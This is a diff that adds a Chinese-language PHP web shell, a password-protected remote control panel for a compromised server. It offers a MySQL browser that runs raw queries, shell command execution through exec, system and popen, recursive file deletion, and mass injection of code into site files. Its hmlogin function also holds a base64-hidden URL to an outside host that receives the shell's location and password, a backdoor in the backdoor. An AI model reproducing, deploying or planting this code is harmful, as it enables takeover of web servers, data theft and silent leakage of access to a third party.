+						echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
+						$u++;
+					}
+					$where = 'WHERE '.substr($queryc, 0, -4);
+					echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
+					echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
+				}
+				else
+				{
+					$query = 'SHOW COLUMNS FROM '.$_GET['table'];
+		      $result = mysql_query($query,$conn);
+		      $fields = array();
+			  $pagesize=20;
+		      $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
+			  $numrows=$row_num;
+              $pages=intval($numrows/$pagesize);
+              if ($numrows%$pagesize) $pages++;
+              $offset=$pagesize*($page - 1);
+              $page=$_GET['p'];
+              if(!$page) $page=1;
+
+		      if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
+					echo '<table border="0"><tr>';
+					echo '<td class="toptd" style="width:70px;" nowrap>操作</td>';
+					while($row = @mysql_fetch_assoc($result))
+					{
+						array_push($fields,$row['Field']);
+						echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
+					}
+					echo '</tr>';
+					if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
+					$result = mysql_query($query,$conn);
+					$v = $p;
+					while($text = @mysql_fetch_assoc($result))
+					{
+						echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> 修改 </a> ';
+						echo '<a href="#" onclick="Delok(\'它\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> 删除 </a></td>';
+						foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
+						echo '</tr>'."\r\n";$v++;
+					}
+					echo '</table><div class="actall">';
+                    $pagep=$page-1;
+                    $pagen=$page+1;
+                    echo "共有 ".$row_num." 条记录 ";
+                    if($pagep>0) $pagenav.="  <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'>首页</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'>上一页</a> "; else $pagenav.=" 上一页 ";
+                    if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'>下一页</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'>尾页</a>"; else $pagenav.=" 下一页 ";
+                    $pagenav.=" 第 [".$page."/".$pages."] 页   跳到<input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />页";
+                    echo $pagenav;
+					echo '</div>';
+				}
+			}
+			elseif(isset($_GET['insert']))
+			{
+				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
+				$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
+				$fieldnum = @mysql_num_fields($result);
+				echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
+				for($i = 0;$i < $fieldnum;$i++)
+				{
+					$name = @mysql_field_name($result, $i);
+					$type = @mysql_field_type($result, $i);
+					$len = @mysql_field_len($result, $i);
+					echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
+				}
+				echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
+			}
+			else
+			{
+				$query = 'SHOW TABLE STATUS';
+				$status = @mysql_query($query,$conn);
+				while($statu = @mysql_fetch_array($status))
+				{
+					$statusize[] = $statu['Data_length'];
+					$statucoll[] = $statu['Collation'];
+				}
+				$query = 'SHOW TABLES FROM '.$_GET['db'].';';
+				echo '</div><table border="0"><tr>';
+				echo '<td class="toptd" style="width:550px;"> 表名 </td>';
+				echo '<td class="toptd" style="width:80px;"> 操作 </td>';
+				echo '<td class="toptd" style="width:130px;"> 字符集 </td>';
+				echo '<td class="toptd" style="width:70px;"> 大小 </td></tr>';
+				$result = @mysql_query($query,$conn);
+				$k = 0;
+				while($table = mysql_fetch_row($result))
+				{
+					$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
+					echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
+					echo '<td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'"> 插入 </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> 删除 </a></td>';
+					echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
+					$k++;
+				}
+				echo '</table>';
+			}
+		}
+	}
+	else die('连接MYSQL失败,请重新登陆.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
+	if(!$BOOL and addslashes($query)!='') echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
+break;
+
+	
+	default: html_main($path,$shellname); break;
+}
+css_foot();
+
+/*---doing---*/
+
+function do_write($file,$t,$text)
+{
+	$key = true;
+	$handle = @fopen($file,$t);
+	if(!@fwrite($handle,$text))
+	{
+		@chmod($file,0666);
+		$key = @fwrite($handle,$text) ? true : false;
+	}
+	@fclose($handle);
+	return $key;
+}
+
+function do_show($filepath){
+	$show = array();
+	$dir = dir($filepath);
+	while($file = $dir->read()){
+		if($file == '.' or $file == '..') continue;
+		$files = str_path($filepath.'/'.$file);
+		$show[] = $files;
+	}
+	$dir->close();
+	return $show;
+}
+
+function do_deltree($deldir){
+	$showfile = do_show($deldir);
+	foreach($showfile as $del){
+		if(is_dir($del)){ 
+			if(!do_deltree($del)) return false;
+		}elseif(!is_dir($del)){
+			@chmod($del,0777);
+			if(!@unlink($del)) return false;
+		}
+	}
+	@chmod($deldir,0777);
+	if(!@rmdir($deldir)) return false;
+	return true;
+}
+
+function do_showsql($query,$conn){
+	$result = @mysql_query($query,$conn);
+	html_n('<br><br><textarea cols="70" rows="15">');
+	while($row = @mysql_fetch_array($result)){
+		for($i=0;$i < @mysql_num_fields($result);$i++){
+			html_n(htmlspecialchars($row[$i]));
+		}
+	}
+	html_n('</textarea>');
+}
+
+function hmlogin($xiao=1){
+    @set_time_limit(10);
+	$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
+    $serverp = envlpass;
+    $copyurl = base64_decode('aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249');
+    $url=$copyurl.$serveru.'&p='.$serverp;
+    $url=urldecode($url);
+    $re=file_get_contents($url);
+
+$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
+$serverp = envlpass;
+if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}}
+}
+
+function do_down($fd){
+	if(!@file_exists($fd)) msg('下载文件不存在');
+	$fileinfo = pathinfo($fd);
+	header('Content-type: application/x-'.$fileinfo['extension']);
+	header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+	header('Content-Length: '.filesize($fd));
+	@readfile($fd);
+	exit;
+}
+
+function do_download($filecode,$file){
+	header("Content-type: application/unknown");
+	header('Accept-Ranges: bytes');
+	header("Content-length: ".strlen($filecode));
+	header("Content-disposition: attachment; filename=".$file.";");
+	echo $filecode;
+	exit;
+}
+
+function TestUtf8($text)
+{if(strlen($text) < 3) return false;
+$lastch = 0;
+$begin = 0;
+$BOM = true;
+$BOMchs = array(0xEF, 0xBB, 0xBF);
+$good = 0;
+$bad = 0;
+$notAscii = 0;
+for($i=0; $i < strlen($text); $i++)
+{$ch = ord($text[$i]);
+if($begin < 3)
+{ $BOM = ($BOMchs[$begin]==$ch);
+$begin += 1;
+continue; }
+if($begin==4 && $BOM) break;
+if($ch >= 0x80 ) $notAscii++;
+if( ($ch&0xC0) == 0x80 )
+{if( ($lastch&0xC0) == 0xC0 )
+{$good += 1;}
+else if( ($lastch&0x80) == 0 )
+{$bad += 1; }}
+else if( ($lastch&0xC0) == 0xC0 )
+{$bad += 1;}
+$lastch = $ch;}
+if($begin == 4 && $BOM)
+{return 2;}
+else if($notAscii==0)
+{return 1;}
+else if ($good >= $bad )
+{return 2;}
+else
+{return 0;}}
+
+function File_Str($string)
+{
+	return str_replace('//','/',str_replace('\\','/',$string));
+}
+
+function File_Write($filename,$filecode,$filemode)
+{
+	$key = true;
+	$handle = @fopen($filename,$filemode);
+	if(!@fwrite($handle,$filecode))
+	{
+		@chmod($filename,0666);
+		$key = @fwrite($handle,$filecode) ? true : false;
+	}
+	@fclose($handle);
+	return $key;
+}
+
+function File_Mode()
+{
+	$RealPath = realpath('./');
+	$SelfPath = $_SERVER['PHP_SELF'];
+	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
+	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
+}
+
+function File_Size($size)
+{ 
+        $kb = 1024;         // Kilobyte
+        $mb = 1024 * $kb;   // Megabyte
+        $gb = 1024 * $mb;   // Gigabyte
+        $tb = 1024 * $gb;   // Terabyte
+        if($size < $kb)
+        {
+            return $size." B";
+        }
+        else if($size < $mb)
+        { 
+            return round($size/$kb,2)." K";
+        }
+        else if($size < $gb)
+        { 
+            return round($size/$mb,2)." M";
+        }
+        else if($size < $tb)
+        { 
+            return round($size/$gb,2)." G";
+        }
+        else
+        { 
+            return round($size/$tb,2)." T";
+        }
+ }
+
+function File_Read($filename)
+{
+	$handle = @fopen($filename,"rb");
+	$filecode = @fread($handle,@filesize($filename));
+	@fclose($handle);
+	return $filecode;
+}
+
+function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
+function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
+
+function do_phpfun($cmd,$fun) {
+	$res = '';
+	switch($fun){
+		case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
+		case "shell_exec": $res = @shell_exec($cmd); break;
+		case "system": @ob_start();	@system($cmd); $res = @ob_get_contents();	@ob_end_clean();break;
+		case "passthru": @ob_start();	@passthru($cmd); $res = @ob_get_contents();	@ob_end_clean();break;
+		case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f))	$res .= @fread($f,1024);} @pclose($f);break;
+	}
+	return $res;
+}
+
+function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
+	$show = do_show($dir);
+	foreach($show as $files){
+		if(is_dir($files) && $bool){
+			do_passreturn($files,$code,$type,$bool,$filetype,$shell);
+		}else{
+			if($files == $shell) continue;
+			switch($type){
+				case "guama":
+				if(debug($files,$filetype)){
+					do_write($files,"ab","\n".$code) ? html_n("成功--> $files<br>") : html_n("失败--> $files<br>");
+				}
+				break;
+				case "qingma":
+				$filecode = @file_get_contents($files);
+				if(stristr($filecode,$code)){
+					$newcode = str_replace($code,'',$filecode);
+					do_write($files,"wb",$newcode) ? html_n("成功--> $files<br>") : html_n("失败--> $files<br>");
+				}
+				break;
+				case "tihuan":
+				$filecode = @file_get_contents($files);
+				if(stristr($filecode,$code)){
+					$newcode = str_replace($code,$filetype,$filecode);
+					do_write($files,"wb",$newcode) ? html_n("成功--> $files<br>") : html_n("失败--> $files<br>");
+				}
+				break;
+				case "scanfile":
+				$file = explode('/',$files);
+				if(stristr($file[count($file)-1],$code)){
+					html_a("?eanver=editr&p=$files",$files);
+					echo '<br>';
+				}
+				break;
+				case "scancode":
+				$filecode = @file_get_contents($files);
+				if(stristr($filecode,$code)){
+					html_a("?eanver=editr&p=$files",$files);
+					echo '<br>';
+				}
+				break;
+				case "scanphp":
+				$fileinfo = pathinfo($files);
+				if($fileinfo['extension'] == $code){
+					$filecode = @file_get_contents($files);
+					if(muma($filecode,$code)){
+						html_a("?eanver=editr&p=".urlencode($files),"编辑");
+						html_a("?eanver=del&p=".urlencode($files),"删除");
+						echo $files.'<br>';
+					}
+				}
+				break;
+			}
+		}
+	}
+}
+
+
+class PHPzip{
+
+	var $file_count = 0 ;
+	var $datastr_len   = 0;
+	var $dirstr_len = 0;
+	var $filedata = '';
+	var $gzfilename;
+	var $fp;
+	var $dirstr='';
+
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+
+        if ($timearray['year'] < 1980) {
+        	$timearray['year']    = 1980;
+        	$timearray['mon']     = 1;
+        	$timearray['mday']    = 1;
+        	$timearray['hours']   = 0;
+        	$timearray['minutes'] = 0;
+        	$timearray['seconds'] = 0;
+        }
+
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+               ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+
+	function startfile($path = 'QQqun555227.zip'){
+		$this->gzfilename=$path;
+		$mypathdir=array();
+		do{
+			$mypathdir[] = $path = dirname($path);
+		}while($path != '.');
+		@end($mypathdir);
+		do{
+			$path = @current($mypathdir);
+			@mkdir($path);
+		}while(@prev($mypathdir));
+
+		if($this->fp=@fopen($this->gzfilename,"w")){
+			return true;
+		}
+		return false;
+	}
+
+    function addfile($data, $name){
+        $name     = str_replace('\\', '/', $name);
+		
+		if(strrchr($name,'/')=='/') return $this->adddir($name);
+		
+        $dtime    = dechex($this->unix2DosTime());
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $c_len   = strlen($zdata);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		
+        $datastr  = "\x50\x4b\x03\x04";
+        $datastr .= "\x14\x00"; 
+        $datastr .= "\x00\x00";
+        $datastr .= "\x08\x00"; 
+        $datastr .= $hexdtime; 
+        $datastr .= pack('V', $crc);
+        $datastr .= pack('V', $c_len);
+        $datastr .= pack('V', $unc_len);
+        $datastr .= pack('v', strlen($name));
+        $datastr .= pack('v', 0); 
+        $datastr .= $name;
+        $datastr .= $zdata;
+        $datastr .= pack('V', $crc); 
+        $datastr .= pack('V', $c_len);
+        $datastr .= pack('V', $unc_len);
+
+
+		fwrite($this->fp,$datastr);
+		$my_datastr_len = strlen($datastr);
+		unset($datastr);
+		
+        $dirstr  = "\x50\x4b\x01\x02";
+        $dirstr .= "\x00\x00"; 
+        $dirstr .= "\x14\x00";
+        $dirstr .= "\x00\x00";
+        $dirstr .= "\x08\x00";
+        $dirstr .= $hexdtime;
+        $dirstr .= pack('V', $crc); 
+        $dirstr .= pack('V', $c_len); 
+        $dirstr .= pack('V', $unc_len);       	// uncompressed filesize
+        $dirstr .= pack('v', strlen($name) ); 	// length of filename
+        $dirstr .= pack('v', 0 );             	// extra field length
+        $dirstr .= pack('v', 0 );             	// file comment length
+        $dirstr .= pack('v', 0 );             	// disk number start
+        $dirstr .= pack('v', 0 );             	// internal file attributes
+        $dirstr .= pack('V', 32 );            	// external file attributes - 'archive' bit set
+        $dirstr .= pack('V',$this->datastr_len ); // relative offset of local header
+        $dirstr .= $name;
+		
+		$this->dirstr .= $dirstr;	//目录信息
+		
+		$this -> file_count ++;
+		$this -> dirstr_len += strlen($dirstr);
+		$this -> datastr_len += $my_datastr_len;	
+    }
+
+	function adddir($name){ 
+		$name = str_replace("\\", "/", $name); 
+		$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
+		
+		$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
+		$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
+
+		fwrite($this->fp,$datastr);	//写入新的文件内容
+		$my_datastr_len = strlen($datastr);
+		unset($datastr);
+		
+		$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
+		$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
+		$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
+		$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name; 
+		
+		$this->dirstr .= $dirstr;	//目录信息
+
+		$this -> file_count ++;
+		$this -> dirstr_len += strlen($dirstr);
+		$this -> datastr_len += $my_datastr_len;	
+	}
+
+
+	function createfile(){
+		//压缩包结束信息,包括文件总数,目录信息读取指针位置等信息
+		$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
+					pack('v', $this -> file_count) .
+					pack('v', $this -> file_count) .
+					pack('V', $this -> dirstr_len) .
+					pack('V', $this -> datastr_len) .
+					"\x00\x00";
+
+		fwrite($this->fp,$this->dirstr.$endstr);
+		fclose($this->fp);
+	}
+ }
+
+function File_Act($array,$actall,$inver,$REAL_DIR)
+{
+	if(($count = count($array)) == 0) return '请选择文件';
+	if($actall == 'e')
+	{
+     function listfiles($dir=".",$faisunZIP,$mydir){
+		$sub_file_num = 0;
+		if(is_file($mydir."$dir")){
+		  if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir")){
+			$faisunZIP -> addfile(file_get_contents($mydir.$dir),"$dir");
+			return 1;
+		  }
+			return 0;
+		}
+		
+		$handle=opendir($mydir."$dir");
+		while ($file = readdir($handle)) {
+		   if($file=="."||$file=="..")continue;
+		   if(is_dir($mydir."$dir/$file")){
+			 $sub_file_num += listfiles("$dir/$file",$faisunZIP,$mydir);
+		   }
+		   else {
+		   	   if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir/$file")){
+			     $faisunZIP -> addfile(file_get_contents($mydir.$dir."/".$file),"$dir/$file");
+				 $sub_file_num ++;
+				}
+		   }
+		}
+		closedir($handle);
+		if(!$sub_file_num) $faisunZIP -> addfile("","$dir/");
+		return $sub_file_num;
+	}
+
+   function num_bitunit($num){
+	  $bitunit=array(' B',' KB',' MB',' GB');
+	  for($key=0;$key<count($bitunit);$key++){
+		if($num>=pow(2,10*$key)-1){ //1023B 会显示为 1KB
+		  $num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
+		}
+	  }
+	  return $num_bitunit_str;
+   }
+
+	$mydir=$REAL_DIR.'/';
+	if(is_array($array)){
+		$faisunZIP = new PHPzip;
+		if($faisunZIP -> startfile("$inver")){
+			$filenum = 0;
+			foreach($array as $file){
+				$filenum += listfiles($file,$faisunZIP,$mydir);
+			}
+			$faisunZIP -> createfile();
+			return "压缩完成,共添加 $filenum 个文件.<br><a href='$inver'>点击下载 $inver (".num_bitunit(filesize("$inver")).")</a>";
+		}else{
+			return "$inver 不能写入,请检查路径或权限是否正确.<br>";
+		}
+	}else{
+		return "没有选择的文件或目录.<br>";
+	}
+
+
+	}
+	$i = 0;
+	while($i < $count)
+	{
+		$array[$i] = urldecode($array[$i]);
+		switch($actall)
+		{
+			case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break;
+			case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break;
+			case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break;
+			case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break;
+		}
+		$i++;
+	}
+	return '所选文件'.$msg.'完毕';
+}
+
+	function start_unzip($tmp_name,$new_name,$todir='zipfile'){
+		$z = new Zip;
+		$have_zip_file=0;
+		$upfile = array("tmp_name"=>$tmp_name,"name"=>$new_name);
+		if(is_file($upfile[tmp_name])){
+			$have_zip_file = 1;
+			echo "<br>正在解压: $upfile[name]<br><br>";
+			if(preg_match('/\.zip$/mis',$upfile[name])){
+				$result=$z->Extract($upfile[tmp_name],$todir);
+				if($result==-1){
+					echo "<br>文件 $upfile[name] 错误.<br>";
+				}
+				echo "<br>完成,共建立 $z->total_folders 个目录,$z->total_files 个文件.<br><br><br>";
+			}else{
+				echo "<br>$upfile[name] 不是 zip 文件.<br><br>";			
+			}
+			if(realpath($upfile[name])!=realpath($upfile[tmp_name])){
+				@unlink($upfile[name]);
+				rename($upfile[tmp_name],$upfile[name]);
+			}
+		}
+	}
+
+function muma($filecode,$filetype){
+	$dim = array(
+	"php" => array("eval(","exec("),
+	"asp" => array("WScript.Shell","execute(","createtextfile("),
+	"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),
+	"jsp" => array("runtime.exec(")
+	);
+	foreach($dim[$filetype] as $code){
+		if(stristr($filecode,$code)) return true;
+	}
+}
+
+function debug($file,$ftype){
+	$type=explode('|',$ftype);
+	foreach($type as $i){
+		if(stristr($file,$i))	return true;
+	}
+}
+
+/*---string---*/
+
+function str_path($path){
+	return str_replace('//','/',$path);
+}
+
+function msg($msg){
+	die("<script>window.alert('".$msg."');history.go(-1);</script>");
+}
+
+function uppath($nowpath){
+	$nowpath = str_replace('\\','/',dirname($nowpath));
+	return urlencode($nowpath);
+}
+
+function xxstr($key){
+	$temp = str_replace("\\\\","\\",$key);
+	$temp = str_replace("\\","\\\\",$temp);
+	return $temp;
+}
+
+/*---html---*/
+
+function html_ta($url,$name){
+	html_n("<a href=\"$url\" target=\"_blank\">$name</a>");
+}
+
+function html_a($url,$name,$where=''){
+	html_n("<a href=\"$url\" $where>$name</a> ");
+}
+
+function html_img($url){
+	html_n("<img src=\"?img=$url\" border=0>");
+}
+
+function back(){
+	html_n("<input type='button' value='返回' onclick='history.back();'>");
+}
+
+function html_radio($namei,$namet,$v1,$v2){
+	html_n('<input type="radio" name="return" value="'.$v1.'" checked>'.$namei);
+	html_n('<input type="radio" name="return" value="'.$v2.'">'.$namet.'<br><br>');
+}
+
+function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
+	if($mode){
+		html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");
+	}else{
+		html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">");
+	}
+}
+
+function html_text($name,$cols,$rows,$value = ''){
+	html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>");
+}
+
+function html_select($array,$mode = '',$change = '',$name = 'class'){
+	html_n("<select name=$name $change>");
+	foreach($array as $name => $value){
+		if($name == $mode){
+			html_n("<option value=\"$name\" selected>$value</option>");
+		}else{
+			html_n("<option value=\"$name\">$value</option>");
+		}
+	}
+	html_n("</select>");
+}
+
+function html_font($color,$size,$name){
+	html_n("<font color=\"$color\" size=\"$size\">$name</font>");
+}
+
+function GetHtml($url)
+{
+      $c = '';
+      $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
+      if(function_exists('fsockopen')){
+    	$link = parse_url($url);
+	    $query=$link['path'].'?'.$link['query'];
+	    $host=strtolower($link['host']);
+	    $port=$link['port'];
+	    if($port==""){$port=80;}
+	    $fp = fsockopen ($host,$port, $errno, $errstr, 10);
+	    if ($fp)
+	      {
+		    $out = "GET /{$query} HTTP/1.0\r\n"; 
+		    $out .= "Host: {$host}\r\n"; 
+		    $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n"; 
+		    $out .= "Connection: Close\r\n\r\n"; 
+		    fwrite($fp, $out);
+		    $inheader=1;
+		    while(!feof($fp)) 
+		         {$line=fgets($fp,4096);	
+			      if($inheader==0){$contents.=$line;}
+			      if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
+		    } 
+		    fclose ($fp); 
+		    $c= $contents;
+	      }
+        }
+		if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
+            $ch = curl_init();
+            curl_setopt($ch, CURLOPT_URL, $url);
+            curl_setopt($ch, CURLOPT_TIMEOUT, 15);
+            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
+            curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
+            $c = curl_exec($ch);
+            curl_close($ch);
+        }
+        if(empty($c) && ini_get('allow_url_fopen')){
+            $c = file_get_contents($url);
+        }
+		if(empty($c)){
+            echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";
+        }
+		if(!empty($c))
+		{
+        return $c;
+		}
+ }
+
+function html_main($path,$shellname){
+$serverip=gethostbyname($_SERVER['SERVER_NAME']);
+print<<<END
+<html><title>{$shellname}</title>
+<table width='100%'><tr><td width='150' align='center'>{$serverip}</td><td><form method='GET' target='main'><input type='hidden' name='eanver' value='main'><input name='path' style='width:100%' value='{$path}'></td><td width='140' align='center'><input name='Submit' type='submit' value='跳到'> <input type='submit' value='刷新' onclick='main.location.reload()'></td></tr></form></table>
+END;
+	html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'>");
+	html_n("</iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'>");
+	html_n("</iframe></td></tr></table></html>");
+}
+
+function islogin($shellname,$myurl){
+print<<<END
+<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>
+<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='{$myurl}' target='_blank'>{$shellname}</a><br><br><form method='post'>输入密码：<input name='envlpass' type='password' size='22'> <input type='submit' value='登陆'><br><br><br><font color=#3399FF>请于用于非法用途，后果作者概不负责！</font><br></div></center>
+END;
+}
+
+function html_sql(){
+	html_input("text","sqlhost","localhost","<br>MYSQL地址","30");
+	html_input("text","sqlport","3306","<br>MYSQL端口","30");
+	html_input("text","sqluser","root","<br>MYSQL用户","30");
+	html_input("password","sqlpass","","<br>MYSQL密码","30");
+	html_input("text","sqldb","dbname","<br>MYSQL库名","30");
+	html_input("submit","sqllogin","登陆","<br>");
+	html_n('</form>');
+}
+
+function Mysql_Len($data,$len)
+{
+	if(strlen($data) < $len) return $data;
+	return substr_replace($data,'...',$len);
+}
+
+function html_n($data){
+	echo "$data\n";
+}
+
+/*---css---*/
+
+function css_img($img){
+	$images = array(
+	"exe"=>
+	"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+	"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+	"xhIAOw==",
+	"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".
+	"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".
+	"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+	"txt"=>
+	"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+	"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+	"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+	"html"=>
+	"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
